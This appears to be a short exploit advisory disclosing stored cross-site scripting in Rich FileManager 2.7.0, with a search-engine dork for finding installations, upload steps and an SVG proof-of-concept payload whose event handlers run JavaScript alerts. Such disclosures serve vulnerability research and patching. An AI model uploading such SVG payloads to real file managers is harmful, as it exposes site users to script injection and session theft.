Rich FileManager 2.7.0 Cross Site Scripting

Rich FileManager version 2.7.0 suffers from a cross site scripting vulnerability via a malicious file upload.


MD5 | ff825b156aac90d9c70c62fecf601923

============================================================================================================================
| # Title : Rich FileManager v2.7.0 xss via file uploads Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 FranASSais V.(Pro) | |
| # Vendor : http://fm.devale.pro/fm.zip |
| # Dork : "Rich FileManager" |
============================================================================================================================

POC :

[+] Dorking Adegn Google Or Other Search Enggine .

[+] choose your file svg and upload it .

svg code

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<defs>
<circle id="indoushka" r="50" cx="100" cy="100" style="fill: #F00">
<set attributeName="fill" attributeType="CSS" onbegin='alert(/indoushka/)' onend='alert(/packet strom security/)' to="#00F" begin="1s" dur="5s" />
</circle>
</defs>
<use xlink:href="#indoushka"/>
</svg>

http://fm.devale.pro/userfiles/index.svg


Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================

Related Posts